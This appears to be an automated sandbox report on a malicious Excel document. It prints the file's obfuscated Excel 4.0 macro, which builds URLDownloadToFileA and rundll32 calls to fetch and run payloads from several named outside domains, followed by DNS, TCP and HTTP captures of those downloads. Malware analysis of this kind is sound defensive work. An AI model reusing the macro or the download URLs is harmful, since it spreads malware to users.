                                                                                                                                                    ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Feb 23, 2021 15:59:53.431101084 CET4971780192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 15:59:53.588314056 CET804971772.52.227.180192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:53.588403940 CET4971780192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 15:59:53.589113951 CET4971780192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 15:59:53.746191025 CET804971772.52.227.180192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:54.049882889 CET804971772.52.227.180192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:54.049967051 CET804971772.52.227.180192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:54.050055027 CET4971780192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 15:59:54.050091982 CET4971780192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 15:59:54.051714897 CET4971780192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 15:59:54.208895922 CET804971772.52.227.180192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:54.218029022 CET4971980192.168.2.3162.241.80.6
                                                                                                                                                    Feb 23, 2021 15:59:54.378669977 CET8049719162.241.80.6192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:54.378787041 CET4971980192.168.2.3162.241.80.6
                                                                                                                                                    Feb 23, 2021 15:59:54.379425049 CET4971980192.168.2.3162.241.80.6
                                                                                                                                                    Feb 23, 2021 15:59:54.538101912 CET8049719162.241.80.6192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:55.088042021 CET8049719162.241.80.6192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:55.088393927 CET4971980192.168.2.3162.241.80.6
                                                                                                                                                    Feb 23, 2021 15:59:55.408802986 CET4972080192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:55.753563881 CET8049720138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:55.753705025 CET4972080192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:55.754218102 CET4972080192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:56.043920994 CET8049720138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:56.826869011 CET8049720138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:56.826890945 CET8049720138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:56.826945066 CET4972080192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:56.826972008 CET4972080192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:56.833287954 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:57.119602919 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:57.119807959 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:57.305826902 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:57.591003895 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:57.592607975 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:57.592642069 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:57.592655897 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:57.592745066 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:57.592783928 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:57.775118113 CET4972380192.168.2.391.199.212.52
                                                                                                                                                    Feb 23, 2021 15:59:57.838704109 CET804972391.199.212.52192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:57.838831902 CET4972380192.168.2.391.199.212.52
                                                                                                                                                    Feb 23, 2021 15:59:57.843202114 CET4972380192.168.2.391.199.212.52
                                                                                                                                                    Feb 23, 2021 15:59:57.904057026 CET804972391.199.212.52192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:57.904131889 CET804972391.199.212.52192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:57.904149055 CET804972391.199.212.52192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:57.904233932 CET4972380192.168.2.391.199.212.52
                                                                                                                                                    Feb 23, 2021 15:59:57.915436983 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:58.200576067 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:58.200772047 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:58.758702040 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 15:59:59.084228039 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:00.088650942 CET8049719162.241.80.6192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:00.088712931 CET4971980192.168.2.3162.241.80.6
                                                                                                                                                    Feb 23, 2021 16:00:01.838239908 CET8049720138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:01.838433981 CET4972080192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:04.803023100 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.803070068 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.803082943 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.803105116 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.803122044 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.803143024 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.803159952 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.803179979 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.803196907 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.803306103 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:04.803369045 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:04.803894997 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.803987026 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:04.805629969 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:04.805676937 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:04.813924074 CET4972980192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 16:00:04.972908020 CET804972972.52.227.180192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.973139048 CET4972980192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 16:00:04.973792076 CET4972980192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 16:00:05.088835955 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.088881016 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.088906050 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.088931084 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.088974953 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.089008093 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090002060 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090033054 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090065956 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090099096 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090104103 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090137005 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090147972 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090169907 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090173960 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090199947 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090221882 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090233088 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090256929 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090265036 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090293884 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090302944 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090310097 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090332985 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090363026 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090363026 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090394020 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090395927 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090419054 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090430975 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090441942 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090460062 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090487003 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090495110 CET44349722138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.090522051 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.090542078 CET49722443192.168.2.3138.36.237.100
                                                                                                                                                    Feb 23, 2021 16:00:05.132586956 CET804972972.52.227.180192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.439776897 CET804972972.52.227.180192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.439815998 CET804972972.52.227.180192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:05.439996958 CET4972980192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 16:00:05.440625906 CET4972980192.168.2.372.52.227.180
                                                                                                                                                    Feb 23, 2021 16:00:05.599416971 CET804972972.52.227.180192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:30.088603973 CET8049719162.241.80.6192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:31.840473890 CET8049720138.36.237.100192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:01:02.904103994 CET804972391.199.212.52192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:01:02.904526949 CET4972380192.168.2.391.199.212.52
                                                                                                                                                    Feb 23, 2021 16:01:02.904666901 CET4972380192.168.2.391.199.212.52
                                                                                                                                                    Feb 23, 2021 16:01:02.965517998 CET804972391.199.212.52192.168.2.3

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Feb 23, 2021 15:59:35.010251045 CET5062053192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:35.067208052 CET53506208.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:35.953295946 CET6493853192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:36.004796028 CET53649388.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:36.131984949 CET6015253192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:36.195096016 CET53601528.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:36.975578070 CET5754453192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:37.024276018 CET53575448.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:38.285831928 CET5598453192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:38.337155104 CET53559848.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:39.673078060 CET6418553192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:39.729824066 CET53641858.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:42.893322945 CET6511053192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:42.944856882 CET53651108.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:46.256175041 CET5836153192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:46.313365936 CET53583618.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:47.222956896 CET6349253192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:47.301136017 CET53634928.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:47.642052889 CET6083153192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:47.692135096 CET53608318.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:47.865226030 CET6010053192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:47.926132917 CET53601008.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:48.853673935 CET6010053192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:48.912281990 CET53601008.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:49.869901896 CET6010053192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:49.927014112 CET53601008.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:50.409563065 CET5319553192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:50.458177090 CET53531958.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:51.688054085 CET5014153192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:51.740336895 CET53501418.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:51.885790110 CET6010053192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:51.943526983 CET53601008.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:53.371618986 CET5302353192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:53.428792953 CET53530238.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:53.646315098 CET4956353192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:53.706569910 CET53495638.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:54.063407898 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:54.216335058 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:55.116333008 CET5934953192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:55.405550003 CET53593498.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:55.901449919 CET6010053192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:55.961211920 CET53601008.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:56.647672892 CET5708453192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:56.697839022 CET53570848.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:57.724984884 CET5882353192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:57.773802042 CET53588238.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 15:59:58.768656015 CET5756853192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 15:59:58.826854944 CET53575688.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:00.216042042 CET5054053192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:00:00.267188072 CET53505408.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:01.156286001 CET5436653192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:00:01.214006901 CET53543668.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:02.130615950 CET5303453192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:00:02.188062906 CET53530348.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:04.251084089 CET5776253192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:00:04.302571058 CET53577628.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:10.667418957 CET5543553192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:00:10.726037979 CET53554358.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:11.955070972 CET5071353192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:00:12.009094000 CET53507138.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:30.100255013 CET5613253192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:00:30.165819883 CET53561328.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:47.600977898 CET5898753192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:00:47.654854059 CET53589878.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:00:48.304879904 CET5657953192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:00:48.356266975 CET53565798.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:01:01.159354925 CET6063353192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:01:01.227663994 CET53606338.8.8.8192.168.2.3
                                                                                                                                                    Feb 23, 2021 16:01:25.464582920 CET6129253192.168.2.38.8.8.8
                                                                                                                                                    Feb 23, 2021 16:01:25.536199093 CET53612928.8.8.8192.168.2.3

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Feb 23, 2021 15:59:53.371618986 CET192.168.2.38.8.8.80xb938Standard query (0)rzminc.comA (IP address)IN (0x0001)
                                                                                                                                                    Feb 23, 2021 15:59:54.063407898 CET192.168.2.38.8.8.80x5b71Standard query (0)pathinanchilearthmovers.comA (IP address)IN (0x0001)
                                                                                                                                                    Feb 23, 2021 15:59:55.116333008 CET192.168.2.38.8.8.80xd82dStandard query (0)jugueterialatorre.com.arA (IP address)IN (0x0001)
                                                                                                                                                    Feb 23, 2021 15:59:57.724984884 CET192.168.2.38.8.8.80x885dStandard query (0)crt.sectigo.comA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Feb 23, 2021 15:59:53.428792953 CET8.8.8.8192.168.2.30xb938No error (0)rzminc.com72.52.227.180A (IP address)IN (0x0001)
                                                                                                                                                    Feb 23, 2021 15:59:54.216335058 CET8.8.8.8192.168.2.30x5b71No error (0)pathinanchilearthmovers.com162.241.80.6A (IP address)IN (0x0001)
                                                                                                                                                    Feb 23, 2021 15:59:55.405550003 CET8.8.8.8192.168.2.30xd82dNo error (0)jugueterialatorre.com.ar138.36.237.100A (IP address)IN (0x0001)
                                                                                                                                                    Feb 23, 2021 15:59:57.773802042 CET8.8.8.8192.168.2.30x885dNo error (0)crt.sectigo.com91.199.212.52A (IP address)IN (0x0001)
                                                                                                                                                    Feb 23, 2021 16:00:47.654854059 CET8.8.8.8192.168.2.30xc792No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • rzminc.com
                                                                                                                                                    • pathinanchilearthmovers.com
                                                                                                                                                    • jugueterialatorre.com.ar
                                                                                                                                                    • crt.sectigo.com

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.34971772.52.227.18080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Feb 23, 2021 15:59:53.589113951 CET1090OUTGET /xklyulyijvn/44250666589120400000.dat HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: rzminc.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 23, 2021 15:59:54.049882889 CET1091INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 23 Feb 2021 14:59:53 GMT
                                                                                                                                                    Server: Apache/2.4.46 (CentOS)
                                                                                                                                                    X-Powered-By: PHP/7.3.27
                                                                                                                                                    Upgrade: h2
                                                                                                                                                    Connection: keep-alive, close
                                                                                                                                                    Cache-Control: private, must-revalidate
                                                                                                                                                    Expires: Tue, 23 Feb 2021 14:59:53 GMT
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.349719162.241.80.680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Feb 23, 2021 15:59:54.379425049 CET1099OUTGET /eznwcdhx/44250666589120400000.dat HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: pathinanchilearthmovers.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 23, 2021 15:59:55.088042021 CET1103INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 23 Feb 2021 14:59:54 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                    Connection: Upgrade, Keep-Alive
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Expires: Tue, 23 Feb 2021 15:04:54 GMT
                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=75
                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.349720138.36.237.10080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Feb 23, 2021 15:59:55.754218102 CET1104OUTGET /xjzpfwc/44250666589120400000.dat HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: jugueterialatorre.com.ar
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 23, 2021 15:59:56.826869011 CET1106INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Date: Tue, 23 Feb 2021 14:59:55 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Powered-By: PHP/7.3.20
                                                                                                                                                    Set-Cookie: e34c2f879dc85bcd47ed95fb5d2ec3c0=56792d47665d2aa3670fa687bfd0d4b3; path=/; secure; HttpOnly
                                                                                                                                                    Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                    Last-Modified: Tue, 23 Feb 2021 14:59:56 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Location: https://jugueterialatorre.com.ar/xjzpfwc/44250666589120400000.dat
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Feb 23, 2021 15:59:56.826890945 CET1106INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    3192.168.2.34972391.199.212.5280C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Feb 23, 2021 15:59:57.843202114 CET1123OUTGET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                    Host: crt.sectigo.com
                                                                                                                                                    Feb 23, 2021 15:59:57.904131889 CET1125INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 23 Feb 2021 14:59:57 GMT
                                                                                                                                                    Content-Type: application/pkix-cert
                                                                                                                                                    Content-Length: 1559
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Last-Modified: Fri, 02 Nov 2018 00:00:00 GMT
                                                                                                                                                    ETag: "5bdb9380-617"
                                                                                                                                                    X-CCACDN-Mirror-ID: mscrl1
                                                                                                                                                    Cache-Control: max-age=14400, s-maxage=3600
                                                                                                                                                    X-CCACDN-Proxy-ID: mcdpinlb5
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Accept-Ranges: bytes
